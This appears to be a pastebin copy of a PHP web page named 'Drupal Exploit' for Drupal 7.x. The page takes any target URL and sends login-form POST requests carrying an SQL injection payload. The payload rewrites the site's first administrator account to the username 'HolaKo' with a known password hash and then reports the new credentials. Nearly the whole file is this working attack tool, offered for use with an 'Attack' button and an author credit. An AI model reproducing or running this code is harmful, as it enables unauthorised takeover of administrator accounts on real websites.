SHOW:
|
|
- or go back to the newest paste.
1 | <!Doctype HTML> | |
2 | <html> | |
3 | <head> | |
4 | <link rel="shortcut icon" href="http://shopget24.com/images/sampledata/hack-run.png"> | |
5 | <title>Drupal Exploit</title> | |
6 | <style type="text/css"> | |
7 | .mymargin{ | |
8 | margin-top:30px; | |
9 | color:white; | |
10 | font-family: monospace; | |
11 | } | |
12 | body{ | |
13 | background-color:#999; | |
14 | } | |
15 | a { | |
16 | color: red; | |
17 | text-decoration: none; | |
18 | } | |
19 | h1 { | |
20 | color: #40E1C9 | |
21 | } | |
22 | h2 { | |
23 | color : #008000; | |
24 | } | |
25 | </style> | |
26 | </head> | |
27 | <body> | |
28 | <center> | |
29 | <img src="http://shopget24.com/images/sampledata/hack-run.png" width="150" height="160"> | |
30 | <div class="mymargin"> | |
31 | <center> | |
32 | <h1>Drupal Exploit</h1> | |
33 | <h2>Version 7.x</h2> | |
34 | <form method="GET" action=""> | |
35 | Site : <input type="text" name="url" placeholder="Example: www.site.com"> | |
36 | <input size="50" type="submit" name="submit" value="Attack"> | |
37 | </form> | |
38 | <br> | |
39 | <?php | |
40 | ||
41 | error_reporting(0); | |
42 | if(isset($_GET['submit'])){ | |
43 | $log = "/user/login"; | |
44 | $url = "http://".$_GET['url']; | |
45 | $holako = "/?q=user"; | |
46 | $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in"; | |
47 | $params = array( | |
48 | 'http' => array( | |
49 | 'method' => 'POST', | |
50 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
51 | 'content' => $post_data | |
52 | ) | |
53 | ); | |
54 | $ctx = stream_context_create($params); | |
55 | $data = file_get_contents($url . '/user/login/', null, $ctx); | |
56 | echo "<h3>Testing user/login </h3>"; | |
57 | if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) { | |
58 | echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$log}'>Click here</a>"; | |
59 | } else { | |
60 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
61 | } | |
62 | } | |
63 | ||
64 | if(isset($_GET['submit'])){ | |
65 | ||
66 | $url = "http://".$_GET['url']."/"; | |
67 | $post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in"; | |
68 | $params = array( | |
69 | 'http' => array( | |
70 | 'method' => 'POST', | |
71 | 'header' => "Content-Type: application/x-www-form-urlencoded\r\n", | |
72 | 'content' => $post_data | |
73 | ) | |
74 | ); | |
75 | $ctx = stream_context_create($params); | |
76 | $data = file_get_contents($url . '?q=node&destination=node', null, $ctx); | |
77 | echo '<h3>Testing at Index</h3>'; | |
78 | if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) { | |
79 | echo "<h1>Success</h1><br><h3>User : HolaKo<br>Password : admin<br><h3><a href='{$url}{$holako}'>Click here</a>"; | |
80 | } else { | |
81 | echo "Error! Either the website isn't vulnerable, or your Internet isn't working. "; | |
82 | } | |
83 | } | |
84 | ||
85 | ?> | |
86 | <h3>Developed By <a href="http://fb.com/black4sniperr">black sniper</h3> | |
87 | </div> | |
88 | </body> | |
89 | </html> |